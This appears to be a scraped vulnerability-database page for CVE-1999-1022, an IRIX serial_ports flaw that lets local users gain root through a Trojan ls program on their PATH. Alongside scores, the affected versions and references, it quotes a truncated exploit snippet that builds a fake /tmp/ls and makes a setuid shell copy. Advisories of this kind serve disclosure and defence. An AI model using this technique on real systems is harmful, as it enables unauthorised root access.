Published: 02/10/1994 Updated: 19/12/2017

CVSS v2 Base Score: 6.2 | Impact Score: 10 | Exploitability Score: 1.9

VMScore: 625

Vector: AV:L/AC:H/Au:N/C:C/I:C/A:C

serial_ports administrative program in IRIX 4.x and 5.x trusts the user's PATH environmental variable to find and execute the ls program, which allows local users to gain root privileges via a Trojan horse ls program.

Vulnerable Product	Search on Vulmon	Subscribe to Product
sgi irix 5.3
sgi irix 4
sgi irix 5.2

source: wwwsecurityfocuscom/bid/464/info A race condition exists in the serial_ports administrative program, as included by SGI in the 5x Irix operating system This race condition allows regular users to execute arbitrary commands as root cat > /tmp/ls #!/bin/sh cp /bin/sh /tmp/foo chmod 4777 /tmp/foo ^D chmod 755 /tmp/ls cd /tmp ...

NVD-CWE-Other http://www.securityfocus.com/archive/1/930 http://www.securityfocus.com/bid/464 https://exchange.xforce.ibmcloud.com/vulnerabilities/2111 https://nvd.nist.gov https://www.exploit-db.com/exploits/19351/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-1999-1022

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect